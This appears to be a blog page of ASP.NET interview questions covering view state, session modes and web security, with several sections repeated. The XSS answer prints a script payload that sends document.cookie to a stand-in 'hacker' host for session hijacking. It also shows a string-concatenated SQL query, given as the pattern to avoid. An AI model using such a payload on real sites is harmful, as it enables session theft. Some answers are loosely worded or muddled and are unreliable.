What is View State in Asp.net?
Ans: View state is nothing but a method that the ASP.NET use to preserve page and control values between postbacks. When the HTML markup for the page is rendered, the current state of the page and values that must be retained during postback are serialized into base64-encoded strings. This information is then put into the view state hidden field.
2). View state is client-side or server side state management technique?
Ans: View state is client-side state management technique
3). What are the client-side state management technique supported by ASP.NET?
Ans: View state
Control state
Hidden fields
Cookies
Query strings
4). View state is used by Asp.net page aromatically or we need to apply it manually?
Ans: View state is used automatically by the ASP.NET page framework to persist information that must be preserved between postbacks.
5). When you can use(take advantage of vs) view state?
or What you can do by use view state?
Ans: a) Keep values between postbacks without storing them in session state or in a user profile.
b) Store the values of page or control properties that you define.
c) Create a custom view state provider that lets you store view state information in a SQL Server database or in another data store.
6). What are the advantages of using view state?
Ans: No server resources are required : The view state is contained in a structure within the page code.
Simple implementation : View state does not require any custom programming to use. It is on by default to maintain state data on controls.
Enhanced security features : The values in view state are hashed, compressed, and encoded for Unicode implementations, which provides more security than using hidden fields.
7). What are the limitations of view state?
Ans: Limitations:
Because view state is stored in the page, it results in a larger total page size.
ASP.NET uses view state only with page and control properties.
View state isn't a good place to store sensitive information that the client shouldn't be allowed to see. click on the below link to keep continue for same type of questions with answers.
Ans: View state is nothing but a method that the ASP.NET use to preserve page and control values between postbacks. When the HTML markup for the page is rendered, the current state of the page and values that must be retained during postback are serialized into base64-encoded strings. This information is then put into the view state hidden field.
2). View state is client-side or server side state management technique?
Ans: View state is client-side state management technique
3). What are the client-side state management technique supported by ASP.NET?
Ans: View state
Control state
Hidden fields
Cookies
Query strings
4). View state is used by Asp.net page aromatically or we need to apply it manually?
Ans: View state is used automatically by the ASP.NET page framework to persist information that must be preserved between postbacks.
5). When you can use(take advantage of vs) view state?
or What you can do by use view state?
Ans: a) Keep values between postbacks without storing them in session state or in a user profile.
b) Store the values of page or control properties that you define.
c) Create a custom view state provider that lets you store view state information in a SQL Server database or in another data store.
6). What are the advantages of using view state?
Ans: No server resources are required : The view state is contained in a structure within the page code.
Simple implementation : View state does not require any custom programming to use. It is on by default to maintain state data on controls.
Enhanced security features : The values in view state are hashed, compressed, and encoded for Unicode implementations, which provides more security than using hidden fields.
7). What are the limitations of view state?
Ans: Limitations:
Because view state is stored in the page, it results in a larger total page size.
ASP.NET uses view state only with page and control properties.
View state isn't a good place to store sensitive information that the client shouldn't be allowed to see. click on the below link to keep continue for same type of questions with answers.
11).What are the session modes available in asp.net?
Ans:
Off
InProc
StateServer(Out-Proc)
SQLServer
Custom
12).What is the default session modes in asp.net?
Ans: InProc
13).What are the disadvantages of using InProc session mode?
Ans: Its stores session information in the current Application Domain.
So it will lose data if we restart the server.
14).Session_End() event is supported by which session mode only?
Ans: Session_End() event is supported by InProc mode only.
15).What do you understand by StateServer(Out-Proc) mode?
Ans: StateServer session mode is also called Out-Proc session mode. StateServer uses a stand-alone Windows Service which is independent of IIS and can also be run on a separate server. This session state is totally managed by aspnet_state.exe. This server may run on the same system, but it's outside of the main application domain where your web application is running. This means if you restart your ASP.NET process, your session data will still be alive.
16).Under StateServer(Out-Proc) mode the session state is managed by?
Ans: aspnet_state.exe
17).What are the advantages and disadvantages of StateServer(Out-Proc) Session mode?
Ans: Advantages:
It keeps data separate from IIS so any issues with IIS will not hamper session data.
It is useful in web farm and web garden scenarios.
Disadvantages:
Process is slow due to serialization and de-serialization.
State Server always needs to be up and running.
18).Under SQLServer Session Mode where the session data store?
Ans: In SQLServersession mode, session data is serialized and stored in A SQL Server database.
19).What is the big disadvantage of SqlServer Session mode?
Ans: The main disadvantage of SqlServer Session mode storage method is the overhead related with data serialization and de-serialization.
20).What are the advantages and disadvantages of SqlServer Session mode?
Ans: Advantages:
Session data not affected if we restart IIS.
The most reliable and secure session management.
It keeps data located centrally, is easily accessible from other applications.
Very useful in web farms and web garden scenarios.
Disadvantages:
Processing is very slow in nature.
Object serialization and de-serialization creates overhead for the application.
As the session data is handled in a different server, we have to take care of SQL Server. It should be always up and running.
Ans:
Off
InProc
StateServer(Out-Proc)
SQLServer
Custom
12).What is the default session modes in asp.net?
Ans: InProc
13).What are the disadvantages of using InProc session mode?
Ans: Its stores session information in the current Application Domain.
So it will lose data if we restart the server.
14).Session_End() event is supported by which session mode only?
Ans: Session_End() event is supported by InProc mode only.
15).What do you understand by StateServer(Out-Proc) mode?
Ans: StateServer session mode is also called Out-Proc session mode. StateServer uses a stand-alone Windows Service which is independent of IIS and can also be run on a separate server. This session state is totally managed by aspnet_state.exe. This server may run on the same system, but it's outside of the main application domain where your web application is running. This means if you restart your ASP.NET process, your session data will still be alive.
16).Under StateServer(Out-Proc) mode the session state is managed by?
Ans: aspnet_state.exe
17).What are the advantages and disadvantages of StateServer(Out-Proc) Session mode?
Ans: Advantages:
It keeps data separate from IIS so any issues with IIS will not hamper session data.
It is useful in web farm and web garden scenarios.
Disadvantages:
Process is slow due to serialization and de-serialization.
State Server always needs to be up and running.
18).Under SQLServer Session Mode where the session data store?
Ans: In SQLServersession mode, session data is serialized and stored in A SQL Server database.
19).What is the big disadvantage of SqlServer Session mode?
Ans: The main disadvantage of SqlServer Session mode storage method is the overhead related with data serialization and de-serialization.
20).What are the advantages and disadvantages of SqlServer Session mode?
Ans: Advantages:
Session data not affected if we restart IIS.
The most reliable and secure session management.
It keeps data located centrally, is easily accessible from other applications.
Very useful in web farms and web garden scenarios.
Disadvantages:
Processing is very slow in nature.
Object serialization and de-serialization creates overhead for the application.
As the session data is handled in a different server, we have to take care of SQL Server. It should be always up and running.
ASP.NET SECURITY INTERVIEW QUESTIONS SET-1
Q 1:- What you will do for make your code more secure?
Ans:- I will review my code from beginning and understand the security issues that are possible in the code, after that i will resolve them.
Q 2:- How much time you will set for review, is there any time limit, if you not getting security issues?
Ans:- I will set reasonable time limit on my review, and then optimize my review for this limit. If I find myself spending too much time in any one area (especially if it is not a high-priority area or objective),then I flag it for later review and move on.
Q 3:- What you will do if you have not much time for (asp.net project) security review?
Ans:- I will limit my reviews to small, manageable pieces of code. This allows me to finish quickly, stay focused, and find a larger number of security issues in the code me examining.
Q 4:- What is the difference between Authentication and Authorization?
Ans:- Authentication means validating users. In this step, we verify user credentials to check whether the person tying to log in is the right one or not.
Authorization on the other hand is keeping track of what the current user is allowed to see and what should be hidden from him.
Q 5:- What do you understand by SQL Injection attack?
Ans:- A SQL injection attack occurs when untrusted input can modify the logic of a SQL query in unexpected ways.
Q 6:- What you will do to prevent SQL injection?
Ans:- I will use parameterized and typed stored procedures.
The typed SQL parameter checks the type and length of the input, and it ensures that the userName input value is treated as a literal value and not as executable code in the database.
Q 7:- If you are not using Stored Procedure, think you are using simple sql statment then what you will do to prevent SQL injections?
Ans:- If the code does not use stored procedures, make sure that it uses parameters in the SQL statements it constructs, as shown in the following example.
select status from Users where UserName=@userName
I will check that the code does not use the following approach, where the input is used directly to construct the executable SQL statement by using string concatenation.
string sql = "select status from Users where UserName='"
+ txtUserName.Text + "'";
Q 8:- What do you understand by XSS?
Ans:- Cross-site scripting (also known as XSS or CSS)
Q 9:- What is Cross-site scripting (XSS)?
Ans:- Cross Site Scripting (or XSS) is one of the most common application-layer web attacks. XSS commonly targets scripts embedded in a page which are executed on the client-side (in the user’s web browser) rather than on the server-side.
Example 1.
For example, the HTML snippet:
Ans:- I will review my code from beginning and understand the security issues that are possible in the code, after that i will resolve them.
Q 2:- How much time you will set for review, is there any time limit, if you not getting security issues?
Ans:- I will set reasonable time limit on my review, and then optimize my review for this limit. If I find myself spending too much time in any one area (especially if it is not a high-priority area or objective),then I flag it for later review and move on.
Q 3:- What you will do if you have not much time for (asp.net project) security review?
Ans:- I will limit my reviews to small, manageable pieces of code. This allows me to finish quickly, stay focused, and find a larger number of security issues in the code me examining.
Q 4:- What is the difference between Authentication and Authorization?
Ans:- Authentication means validating users. In this step, we verify user credentials to check whether the person tying to log in is the right one or not.
Authorization on the other hand is keeping track of what the current user is allowed to see and what should be hidden from him.
Q 5:- What do you understand by SQL Injection attack?
Ans:- A SQL injection attack occurs when untrusted input can modify the logic of a SQL query in unexpected ways.
Q 6:- What you will do to prevent SQL injection?
Ans:- I will use parameterized and typed stored procedures.
The typed SQL parameter checks the type and length of the input, and it ensures that the userName input value is treated as a literal value and not as executable code in the database.
Q 7:- If you are not using Stored Procedure, think you are using simple sql statment then what you will do to prevent SQL injections?
Ans:- If the code does not use stored procedures, make sure that it uses parameters in the SQL statements it constructs, as shown in the following example.
select status from Users where UserName=@userName
I will check that the code does not use the following approach, where the input is used directly to construct the executable SQL statement by using string concatenation.
string sql = "select status from Users where UserName='"
+ txtUserName.Text + "'";
Q 8:- What do you understand by XSS?
Ans:- Cross-site scripting (also known as XSS or CSS)
Q 9:- What is Cross-site scripting (XSS)?
Ans:- Cross Site Scripting (or XSS) is one of the most common application-layer web attacks. XSS commonly targets scripts embedded in a page which are executed on the client-side (in the user’s web browser) rather than on the server-side.
Example 1.
For example, the HTML snippet:
<title>Example document: %(title)</title>
is intended to illustrate a template snippet that, if the variable title has value Cross-Site Scripting, results in the following HTML to be emitted to the browser:
<title>Example document: XSS Doc</title>
A site containing a search field does not have the proper input sanitizing. By crafting a search query looking something like this:
<title>Example document: XSS Doc</title>
A site containing a search field does not have the proper input sanitizing. By crafting a search query looking something like this:
<SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>
Sitting on the other end, at the Webserver, you will be receiving hits where after a double space is the users cookie. You might strike lucky if an administrator clicks the link, allowing you to steal their sessionID and hijack the session.
Q 10:- What is the difference between Windows and Forums Authentication?
Ans:- Windows Authentication: is provided so that web pages
can make use of the local Windows User and Groups.In it windows actual login name and
password is used for authentication.
Forms Authentication: Under Forms Authentication user can able to create their own
login name and password it is basically a cookie based
authentication system which stores the login name and
password in database file.
Q 10:- What is the difference between Windows and Forums Authentication?
Ans:- Windows Authentication: is provided so that web pages
can make use of the local Windows User and Groups.In it windows actual login name and
password is used for authentication.
Forms Authentication: Under Forms Authentication user can able to create their own
login name and password it is basically a cookie based
authentication system which stores the login name and
password in database file.
No comments:
Post a Comment